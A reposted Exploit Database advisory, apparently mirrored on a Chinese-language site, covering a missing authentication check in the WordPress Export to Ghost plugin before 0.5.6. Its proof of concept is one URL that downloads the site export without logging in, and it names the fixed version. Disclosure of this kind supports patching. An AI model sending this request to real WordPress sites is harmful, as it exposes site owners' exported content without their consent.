WordPress Plugin Ghost 0.5.5 – Unrestricted Export Download

Exploit Database
101 阅读

作者： Josh Brody

日期： 2016-05-02
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/39752/

# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
# Date: 28-04-2016
# Software Link: https://wordpress.org/plugins/ghost
# Exploit Author: Josh Brody
# Contact: http://twitter.com/joshmn
# Website: http://josh.mn/
# Category: webapps
 
1. Description
 
Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
 
2. Proof of Concept

http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file

File will be downloaded.
 
3. Solution:

Update to version 0.5.6

https://downloads.wordpress.org/plugin/ghost.0.5.6.zip

last Exploits
WordPress Plugin Ghost 0.5.5 – Unrestricted Export Download的更多信息

PrestaShop 1.7.6.7 – ‘location’ Blind Sql Injection：
Sphider Script – Remote Code Execution：
Web-Ideas Web Shop Standard – SQL Injection：
101 News 1.0 – Multiple-SQLi：
NEC Electra Elite IPK II WebPro 01.03.01 – Session Enumeration：
Rockwell Scada System 27.011 – Cross-Site Scripting：
Whizzy CMS 10.02 – Local File Inclusion：
WsCMS – Multiple SQL Injections：